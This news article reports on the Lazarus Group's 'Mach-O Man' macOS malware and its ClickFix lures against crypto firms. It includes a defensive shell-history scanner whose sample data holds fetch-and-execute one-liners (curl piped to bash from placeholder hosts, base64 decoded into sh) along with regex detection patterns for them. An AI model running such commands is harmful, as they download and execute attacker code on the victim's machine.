North Korean-backed hackers are rolling out new attack vector targeting crypto executives and companies

North Korea’s state-run Lazarus Group is running a new campaign known as “Mach-O Man” that turns routine business communications into a direct path to credential theft and data loss, security experts warned Wednesday.

The collective, with cumulative loot estimated at $6.7 billion since 2017, targets fintech, cryptocurrency and other high-net-worth executives and firms, Natalie Newson, a senior blockchain security researcher at CertiK, told CoinDesk on Wednesday.

In the past two weeks alone, the North Korean hackers have scooped up more than $500 million from the Drift and KelpDAO exploits in what appears to be a sustained campaign. The crypto industry needs to start viewing Lazarus the same way banks view nation-state cyber actors: “as a constant and well-funded threat, not just another headline,” she said.

“What makes Lazarus particularly dangerous right now is their level of activity,” Newson said. “KelpDAO, Drift, and now a new macOS malware kit, all within the same month. This isn’t random hacking; it’s a state-run financial operation running at a scale and speed typical of institutions.”

North Korea has turned crypto theft into a lucrative national industry, and Mach-O Man is just the latest product of that process, she said. While Lazarus created it, other cybercrime groups are also using it.

“It’s a modular macOS malware kit created by Lazarus Group’s infamous Chollima division. It uses native Mach-O binaries tailored for Apple environments where crypto and fintech operate,” she said.

Newson said Mach-O Man uses a delivery method known as ClickFix. “It’s important to be clear because a lot of coverage is conflating two separate things,” she noted. ClickFix is a social engineering technique in which the victim is asked to enter a command into their terminal to fix a simulated connection problem.

It works by having Lazarus send managers an “urgent” meeting invitation over Telegram for a Zoom, Microsoft Teams or Google Meet call, according to Mauro Eldritch, a security expert and founder of threat intelligence firm BCA Ltd.

The link leads to a fake but convincing website that instructs them to copy and paste a simple command into their Mac’s terminal to “fix a connection problem,” giving the attackers immediate access to the company’s systems, SaaS platforms and financial resources. By the time victims realize they have been tricked, it’s usually too late.

There are several variations of this attack, said security threat researcher Vladimir S. den X. There are already cases where Lazarus attackers have hijacked decentralized finance (DeFi) project domains with this new malware, replacing their websites with a fake message from Cloudflare asking visitors to enter a command to grant access.

“These fake ‘verification steps’ guide victims through keyboard shortcuts that run a malicious command,” CertiK’s Newson said. “The site looks real, the instructions seem normal, and the victim initiates the action themselves – which is why traditional security controls often miss it.”
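Because the victim types the command themselves, one of the few traces a ClickFix lure leaves is the pasted one-liner in the user's shell history. The following triage script is an added example written for this article, not tooling from CertiK, BCA or any of the researchers quoted; it parses zsh extended-history lines and flags the shapes such "fix" commands typically take (remote content piped straight into a shell, a fetch inside a command substitution, base64 decoded into a shell, or an AppleScript wrapper around a shell script). The sample history and the `.invalid` hostnames are constructed for the demo and are not indicators from the campaign.

```python
import re

# Constructed sample history in zsh extended format (": <epoch>:<elapsed>;<command>").
# Hostnames are placeholders, not real indicators of compromise.
SAMPLE_HISTORY = """\
: 1700000000:0;git pull origin main
: 1700000100:0;curl -fsSL https://fix-connection.example.invalid/repair | bash
: 1700000200:0;npm test
: 1700000300:0;echo aGVsbG8= | base64 -d | sh
: 1700000400:0;bash -c "$(curl -s https://meet-check.example.invalid/v)"
: 1700000500:0;curl -O https://example.invalid/report.pdf
: 1700000600:0;osascript -e 'do shell script "id"'
"""

# Each rule is one way a pasted one-liner executes remote or obfuscated content.
# The first matching rule supplies the label reported for a command.
RULES = [
    ("fetch_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z|)sh\b")),
    ("fetch_in_command_substitution",
     re.compile(r"\b(ba|z|)sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b")),
    ("base64_decoded_to_shell",
     re.compile(r"base64\s+(-d|-D|--decode)\b[^|;]*\|\s*(ba|z|)sh\b")),
    ("osascript_shell_script",
     re.compile(r"osascript\s+-e\s+.*do shell script", re.IGNORECASE)),
]

_ZSH_EXT = re.compile(r"^: \d+:\d+;(.*)$")

def classify(command):
    """Return the label of the first matching rule, or None if nothing matches."""
    for label, pattern in RULES:
        if pattern.search(command):
            return label
    return None

def scan_history(text):
    """Return (line_no, label, command) for every history line that matches a rule."""
    hits = []
    for n, raw in enumerate(text.splitlines(), 1):
        m = _ZSH_EXT.match(raw)
        cmd = m.group(1) if m else raw  # plain-format history has no prefix
        label = classify(cmd)
        if label:
            hits.append((n, label, cmd))
    return hits

if __name__ == "__main__":
    for n, label, cmd in scan_history(SAMPLE_HISTORY):
        print(f"line {n}: {label}: {cmd}")
```

A hit only means the line merits a look; a plain download such as `curl -O` is deliberately left alone, and a payload that clears history leaves nothing for this check to find.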

Most victims of this hack will not realize their security has been breached until the damage is done, by which time the malware has also already deleted itself.

“They probably don’t know yet,” she said. “If they do, they probably can’t identify which variant affected them.”
